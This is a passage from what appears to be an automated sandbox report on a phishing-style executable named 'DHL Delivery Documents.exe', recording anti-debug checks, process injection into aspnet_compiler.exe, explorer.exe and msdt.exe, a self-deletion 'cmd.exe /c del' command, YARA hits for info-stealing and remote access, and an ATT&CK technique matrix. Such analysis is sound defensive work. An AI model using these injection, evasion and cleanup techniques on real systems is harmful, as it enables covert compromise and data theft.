          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AE73 mov eax, dword ptr fs:[00000030h]7_2_0141AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AE73 mov eax, dword ptr fs:[00000030h]7_2_0141AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AE73 mov eax, dword ptr fs:[00000030h]7_2_0141AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AE73 mov eax, dword ptr fs:[00000030h]7_2_0141AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FC600 mov eax, dword ptr fs:[00000030h]7_2_013FC600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FC600 mov eax, dword ptr fs:[00000030h]7_2_013FC600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FC600 mov eax, dword ptr fs:[00000030h]7_2_013FC600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01428E00 mov eax, dword ptr fs:[00000030h]7_2_01428E00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1608 mov eax, dword ptr fs:[00000030h]7_2_014B1608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142A61C mov eax, dword ptr fs:[00000030h]7_2_0142A61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142A61C mov eax, dword ptr fs:[00000030h]7_2_0142A61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014AFE3F mov eax, dword ptr fs:[00000030h]7_2_014AFE3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01438EC7 mov eax, dword ptr fs:[00000030h]7_2_01438EC7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014AFEC0 mov eax, dword ptr fs:[00000030h]7_2_014AFEC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014236CC mov eax, dword ptr fs:[00000030h]7_2_014236CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C8ED6 mov eax, dword ptr fs:[00000030h]7_2_014C8ED6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014216E0 mov ecx, dword ptr fs:[00000030h]7_2_014216E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014076E2 mov eax, dword ptr fs:[00000030h]7_2_014076E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148FE87 mov eax, dword ptr fs:[00000030h]7_2_0148FE87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014746A7 mov eax, dword ptr fs:[00000030h]7_2_014746A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C0EA5 mov eax, dword ptr fs:[00000030h]7_2_014C0EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C0EA5 mov eax, dword ptr fs:[00000030h]7_2_014C0EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C0EA5 mov eax, dword ptr fs:[00000030h]7_2_014C0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B3D43 mov eax, dword ptr fs:[00000030h]12_2_054B3D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F3540 mov eax, dword ptr fs:[00000030h]12_2_054F3540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05523D40 mov eax, dword ptr fs:[00000030h]12_2_05523D40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05497D50 mov eax, dword ptr fs:[00000030h]12_2_05497D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549C577 mov eax, dword ptr fs:[00000030h]12_2_0549C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549C577 mov eax, dword ptr fs:[00000030h]12_2_0549C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05548D34 mov eax, dword ptr fs:[00000030h]12_2_05548D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553E539 mov eax, dword ptr fs:[00000030h]12_2_0553E539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A4D3B mov eax, dword ptr fs:[00000030h]12_2_054A4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A4D3B mov eax, dword ptr fs:[00000030h]12_2_054A4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A4D3B mov eax, dword ptr fs:[00000030h]12_2_054A4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0547AD30 mov eax, dword ptr fs:[00000030h]12_2_0547AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054FA537 mov eax, dword ptr fs:[00000030h]12_2_054FA537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]12_2_05483D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]12_2_05483D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]12_2_05483D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]12_2_05483D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]12_2_05483D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]12_2_05483D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]12_2_05483D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]12_2_05483D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]12_2_05483D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]12_2_05483D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]12_2_05483D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]12_2_05483D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]12_2_05483D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov eax, dword ptr fs:[00000030h]12_2_054F6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov eax, dword ptr fs:[00000030h]12_2_054F6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov eax, dword ptr fs:[00000030h]12_2_054F6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov ecx, dword ptr fs:[00000030h]12_2_054F6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov eax, dword ptr fs:[00000030h]12_2_054F6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov eax, dword ptr fs:[00000030h]12_2_054F6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05528DF1 mov eax, dword ptr fs:[00000030h]12_2_05528DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0548D5E0 mov eax, dword ptr fs:[00000030h]12_2_0548D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0548D5E0 mov eax, dword ptr fs:[00000030h]12_2_0548D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553FDE2 mov eax, dword ptr fs:[00000030h]12_2_0553FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553FDE2 mov eax, dword ptr fs:[00000030h]12_2_0553FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553FDE2 mov eax, dword ptr fs:[00000030h]12_2_0553FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553FDE2 mov eax, dword ptr fs:[00000030h]12_2_0553FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A2581 mov eax, dword ptr fs:[00000030h]12_2_054A2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A2581 mov eax, dword ptr fs:[00000030h]12_2_054A2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A2581 mov eax, dword ptr fs:[00000030h]12_2_054A2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A2581 mov eax, dword ptr fs:[00000030h]12_2_054A2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05472D8A mov eax, dword ptr fs:[00000030h]12_2_05472D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05472D8A mov eax, dword ptr fs:[00000030h]12_2_05472D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05472D8A mov eax, dword ptr fs:[00000030h]12_2_05472D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05472D8A mov eax, dword ptr fs:[00000030h]12_2_05472D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05472D8A mov eax, dword ptr fs:[00000030h]12_2_05472D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AFD9B mov eax, dword ptr fs:[00000030h]12_2_054AFD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AFD9B mov eax, dword ptr fs:[00000030h]12_2_054AFD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]12_2_05532D82
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]12_2_05532D82
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]12_2_05532D82
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]12_2_05532D82
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]12_2_05532D82
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]12_2_05532D82
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05532D82 mov eax, dword ptr fs:[00000030h]12_2_05532D82
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A35A1 mov eax, dword ptr fs:[00000030h]12_2_054A35A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055405AC mov eax, dword ptr fs:[00000030h]12_2_055405AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_055405AC mov eax, dword ptr fs:[00000030h]12_2_055405AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A1DB5 mov eax, dword ptr fs:[00000030h]12_2_054A1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A1DB5 mov eax, dword ptr fs:[00000030h]12_2_054A1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A1DB5 mov eax, dword ptr fs:[00000030h]12_2_054A1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0550C450 mov eax, dword ptr fs:[00000030h]12_2_0550C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0550C450 mov eax, dword ptr fs:[00000030h]12_2_0550C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AA44B mov eax, dword ptr fs:[00000030h]12_2_054AA44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549746D mov eax, dword ptr fs:[00000030h]12_2_0549746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]12_2_054AAC7B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]12_2_054AAC7B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]12_2_054AAC7B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]12_2_054AAC7B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]12_2_054AAC7B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]12_2_054AAC7B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]12_2_054AAC7B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]12_2_054AAC7B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]12_2_054AAC7B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]12_2_054AAC7B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054AAC7B mov eax, dword ptr fs:[00000030h]12_2_054AAC7B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]12_2_0549B477
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]12_2_0549B477
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]12_2_0549B477
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]12_2_0549B477
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]12_2_0549B477
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]12_2_0549B477
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]12_2_0549B477
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]12_2_0549B477
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]12_2_0549B477
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]12_2_0549B477
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]12_2_0549B477
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549B477 mov eax, dword ptr fs:[00000030h]12_2_0549B477
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6C0A mov eax, dword ptr fs:[00000030h]12_2_054F6C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6C0A mov eax, dword ptr fs:[00000030h]12_2_054F6C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6C0A mov eax, dword ptr fs:[00000030h]12_2_054F6C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6C0A mov eax, dword ptr fs:[00000030h]12_2_054F6C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]12_2_05531C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]12_2_05531C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]12_2_05531C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]12_2_05531C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]12_2_05531C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]12_2_05531C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]12_2_05531C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]12_2_05531C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]12_2_05531C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]12_2_05531C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]12_2_05531C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]12_2_05531C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05531C06 mov eax, dword ptr fs:[00000030h]12_2_05531C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00409B50 LdrLoadDll,7_2_00409B50
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: EB0000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: BFF008Jump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
          Source: explorer.exe, 00000008.00000000.335316675.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.301532126.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.317758768.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.301326680.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.334866837.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.316167591.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000008.00000000.335316675.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.301532126.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.317758768.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.339922682.0000000005E10000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.335316675.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.301532126.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.317758768.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.335316675.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.301532126.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.317758768.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000008.00000000.344779338.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.309195507.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeQueries volume information: C:\Users\user\Desktop\DHL Delivery Documents.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules
          Path Interception712
          Process Injection
          1
          Masquerading
          OS Credential Dumping121
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium11
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools
          LSASS Memory2
          Process Discovery
          Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion
          Security Account Manager31
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)712
          Process Injection
          NTDS1
          Remote System Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets112
          System Information Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information
          Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items11
          Software Packing
